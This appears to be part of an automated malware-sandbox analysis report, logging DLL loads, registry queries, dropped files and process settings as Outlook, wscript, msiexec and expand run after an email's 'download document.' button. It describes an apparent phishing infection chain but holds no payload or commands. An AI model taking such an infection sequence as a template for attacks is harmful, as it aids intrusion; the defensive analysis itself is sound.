Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: slc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: smartscreenps.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: shdocvw.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dpx.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: wdscore.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: dbgcore.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cryptbase.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\msiwrapper.ini

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Window found: window name: SysTabControl32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Persistence and Installation Behavior

AI detected landing page (webpage, office document or email)

Source: Email

LLM: Email contains prominent button: 'download document.'

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\files\b867728e2fb94adfa8d9d574fa44f90b$dpx$.tmp\393b823aa8821f409caf2aa8798668c0.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI900C.tmp			Jump to dropped file

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\MSI900C.tmp

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
